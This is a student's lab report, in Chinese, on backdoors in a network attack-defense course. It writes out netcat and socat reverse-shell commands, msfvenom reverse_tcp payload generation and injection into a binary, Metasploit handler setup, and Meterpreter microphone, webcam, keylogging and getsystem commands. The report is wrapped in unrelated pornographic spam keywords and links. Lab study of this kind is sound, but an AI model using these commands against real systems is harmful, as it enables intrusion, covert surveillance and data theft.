<output id="qn6qe"></output>

    1. <output id="qn6qe"><tt id="qn6qe"></tt></output>
    2. <strike id="qn6qe"></strike>

      亚洲 日本 欧洲 欧美 视频,日韩中文字幕有码av,一本一道av中文字幕无码,国产线播放免费人成视频播放,人妻少妇偷人无码视频,日夜啪啪一区二区三区,国产尤物精品自在拍视频首页,久热这里只有精品12

      20232320 2025-2026-1 《網絡與系統攻防技術》實驗二實驗報告

      1.實驗內容

      關于后門

      什么是后門

      后門是隱藏在系統中的秘密通道,讓攻擊者能夠繞過正常安全控制,隨時訪問和控制目標系統。

      后門如何實現

      ·生成惡意程序(如MSF meterpreter)
      ·通過計劃任務、系統服務、啟動項實現持久化
      ·利用漏洞或社會工程學植入目標系統

      后門攻擊過程

      ·攻擊者監聽特定端口
      ·受害者運行后門程序
      ·建立遠程連接獲取系統控制權
      ·執行竊取數據、監控、提權等操作

      后門本質:秘密通道 + 持久化訪問 = 長期控制系統

      什么是免殺技術

      免殺技術是指使惡意軟件(如后門、病毒)逃避殺毒軟件檢測的技術。
      其核心原理是偽裝(讓惡意代碼看起來像正常程序)、變形(改變代碼特征,避免特征碼匹配)和加密(隱藏惡意行為,運行時解密)

      2.實驗過程

      回答問題

      (1)例舉你能想到的一個后門進入到你系統中的可能方式?

      我認為最常見的是社會工程學攻擊,比如說你收到一封偽裝成“公司年終獎金通知”的郵件,發件人看起來是上級或HR。郵件中包含一個附件,你打開附件,文件提示“需要啟用xxx才能正常查看內容”。你點擊“啟用xxx”,內嵌的代碼便悄悄在后臺從遠程服務器下載并執行后門程序。

      (2)例舉你知道的后門如何啟動起來(win及linux)的方式?

      win

      ·設定在特定時間、用戶登錄時或系統啟動時觸發
      ·后門路徑寫入 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 等鍵值
      ·替換系統程序調用的合法DLL,當該程序運行時,惡意DLL被加載

      linux

      ·通過crontab -e添加定時任務
      ·創建一個.service文件,配置為系統服務
      ·例如替換 ls、ps 等常用命令,當管理員使用這些命令時觸發后門

      (3)Meterpreter有哪些給你映像深刻的功能?

      ·可以從一個進程瞬間遷移注入到另一個穩定系統進程
      ·完全運行在內存中,不向硬盤寫入文件,繞過了許多基于文件掃描的殺毒軟件
      ·Meterpreter的通信默認是加密的,網絡入侵檢測系統難以發現其惡意流量

      (4)如何發現自己有系統有沒有被安裝后門?

      ·查看異常的外連IP和端口,特別是監聽狀態和已建立的連接到未知地址的連接
      ·分析安全日志
      ·性能監控
      ·對比系統關鍵目錄的文件哈希值與干凈版本是否一致,以發現被替換的系統文件

      進行實驗

      (1)使用netcat獲取主機操作Shell,cron啟動某項任務(任務自定)

      <1>主機和虛擬機相互ping通

      本機:172.16.177.230
      虛擬機:192.168.190.129
      aa070c174d2584c7bc2666c938028d7
      951c269eab19f37750c63de63fbd18c

      <2>netcat獲取主機操作shell

      本機命令行輸入ncat.exe -l -p 8888
      6adfa0dab2b47ff6eef43c9fe57a849
      虛擬機進入root模式并輸入nc 172.16.177.230(本機地址) -e /bin/sh
      4ca42fd95b93061d0aa7e48f48336bf
      回到本機,輸入ls
      34e95c78d27bfbb1c668caf0e531989
      其中解決了GBK和utf-8編碼問題
      910e3df76570ab883b0c424af538e3e
      可以顯示虛擬機目錄

      <3>利用cron創建定時任務

      創建每五分鐘運行一次的寫任務
      6adfa0dab2b47ff6eef43c9fe57a849
      在虛擬機中成功運行
      c738046b3c636aba90c18f3a0c10b70

      (2)使用socat獲取主機操作Shell, 任務計劃啟動

      <1>相互ping通

      本機:192.168.5.7
      虛擬機:192.168.190.129
      0ae54396be1ce51f02e52f5feb00a33
      befcda3926713dcaf10f2e3d657bcd3

      <2>socat連接本機

      本機進入socat文件夾并輸入.\socat.exe tcp-listen:8888 exec:cmd.exe,pty,stderr
      e06fc0e43c188120739d997d9f29ee1
      虛擬機終端輸入socat - tcp:192.168.5.7:8888
      332be7e89afc14d417baa9a62da35b9
      提前準備好一個任務,虛擬機輸入運行命令,這里我準備的任務是在本機建立一個txt文件,里面的內容是i am 20232320
      40325b1b62823294806c86fbbba6cce
      2520cda8b8344728f7536dc74ce2b6e
      運行成功

      (3)使用MSF meterpreter(或其他軟件)生成可執行文件(后門),利用ncat或socat傳送到主機并運行獲取主機Shell

      <1>生成可執行文件

      本機:172.16.219.120
      虛擬機:192.168.190.129
      虛擬機中輸入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.190.129 LPORT=8888 -f exe > 20232320backdoor.exe
      285db844f6c153bd9577a4e901ffe28

      <2>利用netcat傳送到主機

      本機終端中輸入ncat.exe -lv 8888 > "D:\Desktop\20232320backdoor.exe"傳送到本機
      4c3001f8fa5508ee8388bf60855192f
      可以看到20232320backdoor.exe已經存在于本機
      6d999b0439abd7460b8123bd3895c2e

      <3>虛擬機開啟監聽

      虛擬機輸入msfconsole后依次進行配置,配置如下:
      use exploit/multi/handler(使用監聽模塊,設置payload)
      set payload windows/meterpreter/reverse_tcp (使用和生成后門程序時相同的payload)
      set LHOST 192.168.190.129 (攻擊機的IP地址,和生成后門程序時指定的IP相同)
      set LPORT 8888(監聽的端口)
      6ed2d0af410df304c52549ab5b579a0
      然后開始建立連接
      a219a566786ee205329fd4c5693c5a1
      此時在本機上運行20232320backdoor.exe
      回到虛擬機已獲得本機shell
      f64a65cd3269ef6b620945ecb85bc8f

      (4)使用MSF meterpreter(或其他軟件)生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容的后門,并嘗試提權

      <1>獲取目標主機音頻、攝像頭、擊鍵記錄等內容

      保持上一步操作獲得的shell,分別輸入以下命令
      音頻record_mic
      攝像頭webcam_snap
      鍵入內容
      keyscan_startkeyscan_dump
      3c13310862c6c0a9cdaa673b9d682fe
      aa0a96eac808a0e19086d3d7211edb4
      23a86320ebdc695e58e6ebbfa29696d

      <2>提權

      查看當前用戶getuid
      輸入提權指令getsystem
      52f86322105e99f1abaf67f6adf44ee

      (5)使用MSF生成shellcode,注入到實踐1中的pwn1中,獲取反彈連接Shell

      <1>生成新的shellcode

      msfvenom -p linux/x86/meterpreter/reverse tcp LHOST=192.168.190.129 LPORT=8888 -x "/home/kali/桌面/pwn20232320"-f elf > "/home/kali/桌面/pwn2_5_20232320"
      1bc3f9d3633d8eb3bf199034e99765f
      賦予權限chmod a+x "/home/kali桌面/pwn2_5_20232320"
      070090d8412c1fe21996c489f11b8fc

      <2>再次監聽

      和之前相同配置,但是注意把Windows換成linux
      use exploit/multi/handler
      set PAYLOAD linux/x86/meterpreter/reverse_tcp
      set LHOST 192.168.190.129
      set LPORT 8888
      exploit
      監聽并運行pwn2_5_20232320
      3830f3cc5c17cb91a26ac9ccafdf934
      連接成功,獲取shell
      6a177df51b668bd7b46aad1b2ed0669

      3.問題及解決方案

      -問題一:

      6e4c672bd4a97851c5c5b2d7bf0a570

      -問題一解決:未綁定端口

      4ca42fd95b93061d0aa7e48f48336bf

      -問題二:查看程序說成功運行但是未在對應目錄下找到創建的文件

      332be7e89afc14d417baa9a62da35b9
      5c00358a1a2c7a6d611e43bbacf25c3

      -問題二解決:問題中文路徑支持不好,改到了使用用戶桌面路徑

      40325b1b62823294806c86fbbba6cce

      -問題三:Meterpreter會話建立了但是立即斷開了,顯示reason:died

      769b00daad471f662a2e6a4656c943c

      -問題三解決:Kali Linux 系統中安裝的 Ruby 版本(Ruby 3.1)與 Metasploit 框架當前版本所依賴的 Ruby 版本不兼容

      依據畢悠塵同學的思路,更新 Metasploit 框架及其所有依賴項,確保它們與當前系統的 Ruby 版本兼容
      在虛擬機中輸入下面兩條指令:
      sudo apt update
      sudo apt install metasploit-framework
      前往微軟官方下載頁面:Microsoft Visual C++ Redistributable Latest Supported Downloads
      下載 vc_redist.x86.exe(32位版本),msfvenom生成的后門是32位的,所以需要安裝32位的組件包。
      這時再次進行相同步驟的實驗,可以發現實驗完成。

      -問題四:生成新的shellcode時找不到文件

      72ff0b8ba6d39e32fe2660f1143cfbc

      -問題四解決:Kali的中文"桌面"和英文"Desktop"是兩個不同的目錄,會導致路徑問題

      切到中文桌面路徑
      b300a3e775bb3d8b2296aff7bc8e770
      aa766af6a56df51c1fffb28733969eb

      4.學習感悟及思考

      在本次實驗中我首先學習了netcat和socat,也掌握了cron的基本概念和用法,在利用后門獲取不管是本機還是虛擬機的shell權限中,我對后門這種“隱秘通道”的理解加深了,我認為它并不是一個實質性的攻擊程序,而是利用了系統本身的信任機制巧妙奪取合法權限。
      通過自己切身操作成功獲取一個個Shell,理解攻擊的原理才能知道應該在何處布防,我開始思考在平時日常生活中對于后門攻擊的防范,后門一旦布下對于被攻擊的主機來說就再無隱私可言,所以學習網絡攻防不應只將網絡安全視為一道靜態的防火墻,而是一場動態的、在細節中決出勝負的博弈,不斷提高自身素養才能在這場斗爭中掌握主動權。

      參考資料

      https://blog.csdn.net/2301_79518550/article/details/149029359
      https://blog.csdn.net/weixin_54430466/article/details/121678118

      posted @ 2025-10-20 15:08  20232320黃馨儀  閱讀(21)  評論(0)    收藏  舉報
      主站蜘蛛池模板: 午夜福利高清在线观看| 亚洲精品成人一二三专区| 黑人玩弄人妻中文在线| 国产精品中文字幕在线| 日韩人妻少妇一区二区三区| 国产高清视频在线播放www色| 国产成人午夜福利院| 午夜福利yw在线观看2020 | 国产精品中文字幕日韩| 无码人妻丰满熟妇片毛片| 国产欧亚州美日韩综合区| 亚洲 一区二区 在线| 国产黄大片在线观看画质优化| 中文字幕一区二区三区精华液| 国产中文字幕精品在线| 日韩大片看一区二区三区| 亚洲午夜亚洲精品国产成人| 亚洲一区二区三区十八禁| 久久久久无码国产精品一区| 国产午夜精品理论大片| 一级片黄色一区二区三区| 日韩人妻少妇一区二区三区| 免费国产拍久久受拍久久| 日韩精品视频一区二区不卡| 日本精品人妻无码77777| 成人亚洲av免费在线| 日韩一卡二卡三卡四卡五卡| 91福利一区二区三区| 欧美人与zoxxxx另类| 久久综合伊人77777| 久久精品视频一二三四区| 丰满少妇又爽又紧又丰满在线观看| 婷婷久久综合九色综合88| 成人aⅴ综合视频国产| 在线人成免费视频69国产| 天天看片视频免费观看| 色爱区综合激情五月激情| 成人国产精品日本在线观看| 黄又色又污又爽又高潮| AV秘 无码一区二| 国产精品青青在线观看爽香蕉|